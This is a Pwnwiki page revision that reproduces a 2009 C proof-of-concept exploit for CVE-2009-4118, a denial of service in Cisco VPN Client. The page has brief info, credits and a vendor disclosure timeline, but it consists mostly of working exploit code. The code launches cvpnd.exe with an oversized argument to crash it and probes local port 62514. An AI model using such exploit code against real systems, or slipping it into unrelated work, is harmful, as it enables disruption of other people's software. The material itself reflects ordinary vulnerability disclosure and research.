https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2009-4118_Cisco_VPN_Client%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E
CVE-2009-4118 Cisco VPN Client拒絕服務漏洞 - Revision history
2026-04-17T01:41:31Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2009-4118_Cisco_VPN_Client%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&diff=898&oldid=prev
Pwnwiki: Created page with "==INFO== <pre> # CVE-2009-4118 Cisco VPN Client - Integer Overflow Denial of Service Exploit-DB publication at https://www.exploit-db.com/exploits/10190/ # Cisco official I..."
2021-04-02T04:10:03Z
<p>Created page with "==INFO== <pre> # CVE-2009-4118 Cisco VPN Client - Integer Overflow Denial of Service Exploit-DB publication at https://www.exploit-db.com/exploits/10190/ # Cisco official I..."</p>
<p><b>New page</b></p><div>==INFO==<br />
<pre><br />
# CVE-2009-4118<br />
Cisco VPN Client - Integer Overflow Denial of Service<br />
<br />
Exploit-DB publication at https://www.exploit-db.com/exploits/10190/<br />
<br />
# Cisco official Intelligence AlertID 19445 and Credits <br />
<br />
http://tools.cisco.com/security/center/viewAlert.x?alertId=19445<br />
<br />
<br />
<br />
# Author <br />
Alex Hernandez aka <em><a href="https://twitter.com/_alt3kx_" rel="nofollow">(@\_alt3kx\_)</a></em><br />
<br />
</pre><br />
<br />
==EXP==<br />
<pre><br />
/*<br />
Cisco VPN client version 5.0.03.0560<br />
Cisco VPN client Version 5.0.04.0300<br />
Cisco VPN client Version 5.0.05.0290<br />
Cisco VPN client Version 4.8.02.0010 <br />
*/<br />
<br />
/* <br />
* Cisco VPN Client 0day Integer overflow (DOS) Proof Of Concept Code<br />
*<br />
* By Alex Hernandez aka alt3kx (c) November 2009<br />
*<br />
* This POC is only for test. If an application read a malformed chars <br />
* file like this POC, the application will be crashed.<br />
*<br />
* We tested this code on:<br />
*<br />
* Windows Vista Bussines SP1 Spanish<br />
* Windows Vista Home Premium SP1 English<br />
* Windows 2000 Server English<br />
* Windows XP Professional SP3<br />
*<br />
* Cisco VPN client version 5.0.03.0560<br />
* Cisco VPN client Version 5.0.04.0300<br />
* Cisco VPN client Version 5.0.05.0290<br />
* Cisco VPN client Version 4.8.02.0010<br />
* <br />
* Compiled on VC++ win32<br />
* <br />
* Friends:<br />
* sirdarckcat, nitr0us, hkm, crypkey, xDAWN, canit0, chr1x<br />
*<br />
* TT & DSRT<br />
* daSh, p4r4n01ds, darkslaker, beto, motis. <br />
*<br />
* Very special credits to:<br />
*<br />
* str0ke (milw0rm.com)<br />
* rathaus (securiteam.com)<br />
* FX (Phenoelit.de)<br />
* dSR! (segfault.es)<br />
* 0dd (0dd.com)<br />
* <br />
* <br />
* PH-Neutral 0x7d9, We hope to see u there intruders<br />
* <br />
* ---------------<br />
* Report Timeline <br />
* ---------------<br />
* 06/03/2009 The vulnerability was discovered.<br />
* 07/03/2009 Exploit/PoC code was developed (private).<br />
* 09/03/2009 Cisco PSIRT was notified about the issue.<br />
* 11/03/2009 Vendor response asking for details of the testing environment.<br />
* 12/03/2009 Test scenario explained and sent a PDF document with details.<br />
* 16/03/2009 Developers/PSIRT confirmed the vulnerability.<br />
* 19/03/2009 New test scenarios around new versions (CISCO VPN client).<br />
* 23/03/2009 CISCO PSIRT assing an internal tracking PSIRT-0676131279.<br />
* 23/03/2009 CISCO PSIRT assing an Bug ID-CSCsz49276.<br />
* 15/04/2009 New Advisory release (private).<br />
* 16/04/2009 New PSIRT feedback no ETA avaiable.<br />
* 23/04/2009 The development team working the fix.<br />
* 01/05/2009 The development team estimated one month to fix.<br />
* 01/06/2009 New PSIRT feedback, no ETA available.<br />
* 29/06/2009 The development team estimated one month to fix.<br />
* 28/07/2009 The development team working on maitenance release.<br />
* 28/07/2009 The development team estimated one month to fix.<br />
* 02/09/2009 New vulnerabilities found on CISCO VPN client.<br />
* 02/09/2009 The development team can not publish the new version 5.0.6.<br />
* 02/09/2009 The development team working on maitenance release.<br />
* 02/09/2009 The development team estimated one month to fix.<br />
* 10/09/2009 The BETA program should be finished by the end of Oct <br />
* and the client posted next month.<br />
* 07/10/2009 The development team estimated one month to fix.<br />
* 11/11/2009 New PSIRT feedback RNA avaiable.<br />
* 19/11/2009 The vulnerability goes public and PSIRT is informed.<br />
* 19/11/2009 Fix and details will available on CISCO Intellishield Alert & Bug Tool kit.<br />
* <br />
* CISCO Fix and Details:<br />
* <br />
* BugToolKit:<br />
* http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCsz49276<br />
*<br />
* Intellishield Alert:<br />
* http://tools.cisco.com/security/center/viewAlert.x?alertId=19445<br />
* <br />
*/<br />
<br />
#include <windows.h><br />
#include <winsock.h><br />
#include <stdio.h><br />
#pragma comment ( lib, "ws2_32.lib" )<br />
<br />
int CheckPortUDP( short int nPort )<br />
{<br />
struct sockaddr_in nSockServer;<br />
<br />
WSADATA wsaData;<br />
<br />
int lBusy = 0;<br />
int nSocket;<br />
<br />
/* Initialization */<br />
if( WSAStartup( 0x0101, &wsaData ) == 0 )<br />
{<br />
/* Create Socket */<br />
nSockServer.sin_family = AF_INET;<br />
nSockServer.sin_port = htons( nPort );<br />
nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" );<br />
<br />
/* Check UDP Protocol */<br />
nSocket = socket( AF_INET, SOCK_DGRAM, 0 );<br />
<br />
lBusy = ( bind( nSocket, (SOCKADDR FAR *) &nSockServer,<br />
sizeof( SOCKADDR_IN ) ) == SOCKET_ERROR );<br />
<br />
/* Close Socket if Busy */<br />
if( lBusy )<br />
closesocket( nSocket );<br />
<br />
/* Close Winsock */<br />
WSACleanup();<br />
}<br />
<br />
/* Return */<br />
return( lBusy );<br />
}<br />
<br />
int CheckPortTCP( short int nPort )<br />
{<br />
struct sockaddr_in nSockServer;<br />
<br />
WSADATA wsaData;<br />
<br />
int lBusy = 0;<br />
int nSocket;<br />
<br />
/* Initialization */<br />
if( WSAStartup( 0x0101, &wsaData ) == 0 )<br />
{<br />
/* Create Socket */<br />
nSockServer.sin_family = AF_INET;<br />
nSockServer.sin_port = htons( nPort );<br />
nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" );<br />
<br />
/* Check TCP Protocol */<br />
nSocket = socket( AF_INET, SOCK_STREAM, 0 );<br />
<br />
lBusy = ( connect( nSocket, (struct sockaddr *) &nSockServer,<br />
sizeof( nSockServer ) ) == 0 );<br />
<br />
/* Close Socket if Busy */<br />
if( lBusy )<br />
closesocket( nSocket );<br />
<br />
/* Close Winsock */<br />
WSACleanup();<br />
}<br />
<br />
/* Return */<br />
return( lBusy );<br />
}<br />
<br />
int main(void)<br />
{<br />
<br />
char szPath[] = "C:\\Program Files\\Cisco Systems\\VPN Client\\cvpnd.exe";<br />
//uncomment this line for Windows XP Spanish versions<br />
//char szPath[] = "C:\\Archivos de programa\\Cisco Systems\\VPN Client\\cvpnd.exe";<br />
char buffer[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";<br />
PROCESS_INFORMATION pif;<br />
STARTUPINFO si;<br />
ZeroMemory(&si,sizeof(si));<br />
si.cb = sizeof(si);<br />
<br />
BOOL bRet = CreateProcess(<br />
szPath,<br />
buffer,<br />
NULL,<br />
NULL,<br />
FALSE,<br />
0,<br />
NULL,<br />
NULL,<br />
&si,<br />
&pif);<br />
<br />
system("cls");<br />
printf("\n .:: Cisco VPN Client 0day Integer overflow (DoS) Proof Of Concept Code ::.\n");<br />
printf(" .:: By Alex Hernandez aka alt3kx (c) November 2009 .::\n\n"); <br />
<br />
<br />
/* Check for TCP Port */<br />
<br />
if( CheckPortTCP(62514) )<br />
printf("[+] Cisco VPN Client TCP port listening\t[OK!]\n");<br />
else<br />
printf("[+] Cisco VPN Client TCP Port isn't Busy\t[Wrong!]\n");<br />
<br />
/* Check for UDP Port */<br />
<br />
if( CheckPortUDP(62514) )<br />
printf("[+] Cisco VPN Client UDP port listening\t[OK!]\n");<br />
else<br />
printf("[+] Cisco VPN Client UDP Port isn't Busy\t[Wrong!]\n");<br />
<br />
if(bRet == FALSE){MessageBox(HWND_DESKTOP,"Unable to start program check the default PATH Cisco VPN Client cvpnd.exe\n","",MB_OK);<br />
return 1;}<br />
<br />
else if (bRet == TRUE){MessageBox(HWND_DESKTOP,"Attempting exploit Cisco VPN DoS exploit...","",MB_OK);<br />
printf("\n[+] Few seconds to crash the program...\n");<br />
printf("[+] Exploit success...\n\n");<br />
return 1;} <br />
<br />
CloseHandle(pif.hProcess);<br />
CloseHandle(pif.hThread);<br />
<br />
}<br />
</pre></div>
Pwnwiki